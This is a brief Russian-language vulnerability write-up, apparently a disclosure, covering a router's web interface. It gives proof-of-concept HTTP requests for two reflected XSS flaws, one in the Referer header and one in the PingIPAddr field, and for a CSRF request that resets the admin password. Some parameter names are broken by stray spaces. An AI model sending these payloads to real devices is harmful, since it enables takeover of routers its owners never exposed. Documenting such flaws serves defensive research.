1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере. Код: GET /doesnotexist HTTP/1.1 Host: 192.168.1.1 Referer: http://fent"><script>alert("XSS")</script> Connection: keep-alive 2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr. Код: Host: <IP> Referer: http://<IP>/maintenance/tools_test.htm Authorization: Basic blablabla== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+ 3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос: Код: http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED